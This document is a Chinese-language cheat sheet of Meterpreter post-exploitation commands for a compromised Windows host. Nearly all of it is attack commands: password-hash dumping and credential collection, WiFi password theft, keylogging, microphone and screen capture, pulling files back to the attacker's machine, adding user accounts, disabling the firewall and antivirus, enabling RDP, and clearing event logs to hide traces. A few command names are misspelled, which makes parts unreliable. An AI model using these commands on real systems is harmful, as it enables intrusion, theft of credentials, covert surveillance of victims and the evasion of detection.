自己收集的后渗透之Meterpreter会话

系统常用命令 

将会话置于后台：background

查看运行时间：idletime

查看当前用户身份：getuid

查看当前用户具备的权限：getprivs

查看当前进程PID：getpid

查看目标机系统信息：sysinfo

查看正在运行的进程：ps

搜寻、拷贝、上传文件（需要拥有system权限，可以利用getsystem、MS16-032漏洞进行提权）
    （1）搜寻c盘内所有以txt为后缀的文件：search -f *.txt -d c:
    （2）拷贝文件至kali内：download c:1.txt /root
    （3）上传文件至win7：upload /home/zidian/msfadmin.txt c:

重启/关机：reboot / shutdown -h now

进入cmd：shell

获取cmd后常用命令

查看当前用户：whoami

添加用户和对应密码：net user [username] [password] /add

查看当前计算机中的详细情况：systeminfo

关闭防火墙：netsh adcfirewall set allprofiles state off

查看当前计算机中网络连接通信情况：netstat -ano

网络命令 

查看网络接口信息：ipconfig/ifconfig

查看arp缓冲表：arp

查看代理：getproxy   

查看路由：route   

其他

捕获截图：screenshot

捕获麦克风：run sound_recorder

捕获键盘记录：run post/windows/capture/keylog_recorder或keyscan_start、keyscan_dump也行

获取系统信息：run scraper

迁移进程：run post/windows/manage/migrate或migrate PID号

关闭杀毒软件：run killav

获取系统密码哈希值：run hashdump

查看目标主机上所有流量：run packetrecorder -i 1，随后将生成的文件用wireshark查看获取的数据包即可

展示受控系统上的本地子网：run get_loacl_subnets

清除痕迹
    输入irb
        log=client.sys.eventlog.open('system')
        log=client.sys.eventlog.open('security')
        log=client.sys.eventlog.open('application')
        log=client.sys.eventlog.open('dns server')
        log=client.sys.eventlog.open('directory service')
        log=client.sys.eventlog.open('file replication service')
        最后执行log.clear
    或者直接输入clearev即可

常用脚本

自动化执行一些检测脚本：run winenum 

获取用户hash：run credcollect

获取域管理账户列表：run domain_list_gen 

是否是wins、linux虚拟机：run post/windows/gather/checkvm、run post/linux/gather/checkvm

查看磁盘分区信息：run post/windows/gather/forensics/enum_drives  

获取最近访问过的文档、链接信息：run post/windows/gather/dumplinks 

获取IE缓存：run post/windows/gather/enum_ie

获取firefox缓存：run post/windows/gather/enum_firefox

获取Chrome缓存：run post/windows/gather/enum_chrome 

获取本地提权漏洞：run post/multi/recon/local_exploit_suggester

获取补丁信息：run post/windows/gather/enum_patches

查找域控：run post/windows/gather/enum_domain

用于读取目标主机WiFi密码：run post/windows/wlan/wlan_profile 

基于wlan进行地理位置确认，文件位于/root/.msf4/loot：run post/multi/gather/wlan_geolocate

关闭杀毒软件：run post/windows/manage/killav 

启动目标机远程桌面RDP(3389)服务：run post/windows/manage/enable_rdp

枚举用户登录目标机：run post/windows/gather/enum_logged_on_users 

枚举目标机应用程序：run post/windows/gather/enum_applications